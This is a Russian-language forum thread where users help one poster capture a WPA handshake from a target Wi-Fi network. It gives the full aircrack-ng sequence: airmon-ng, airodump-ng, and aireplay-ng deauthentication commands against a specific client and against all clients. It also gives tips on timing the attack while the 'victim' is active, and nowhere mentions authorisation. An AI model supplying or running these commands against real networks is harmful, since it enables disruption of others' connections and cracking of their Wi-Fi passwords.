Не хочет отключать клиента командой aireplay --deauth 5 -a B0:4E:26:B4:5A:62 -b 10:F1:F2:66:48:4F wlan0mon Адаптер alfa tube (n)
Я так понял вы хотите перехватить хендшейк? попробуйте aireplay-ng -0 0 -a B0:4E:26:B4:5A:62 -c 10:F1:F2:66:48:4F wlan0mon aireplay-ng -0 0 -a B0:4E:26:B4:5A:62 wlan0mon для деаутентификации всех клиентов
Опиши полную последовательность своих действий причины могут быть разные, клиент "не спешит" подключаться к точке, расстояние до точки
airmon-ng check kill airmon-ng start wlan0 airodump-ng wlan0mon Нашел жерту airodump-ng --bssid (mac) --channel (допустим 5) -w /root/Desktop/ wlan0mon aireplay-ng -0 0 -a (mac роутера) -c (mac клиента) wlan0mon
я так думаю что клиент "не спешит" подключаться, т.е. активно не пользуется точкой, пробуй по другому либо жди
Не факт. Запусти airodump-ng. Можно все близлежащие точки посмотреть, можно только целевую отслеживать. Там в колонке Data если идут пакеты (набирается сумма) - клиент на точке и в интернете. Самое время его уработать.
Желательно, чтобы клиенты сети ( вернее их mac адреса ) были видны в соответствующей колонке station и их pwr был отличный от -1! это в терминале c airodump-ng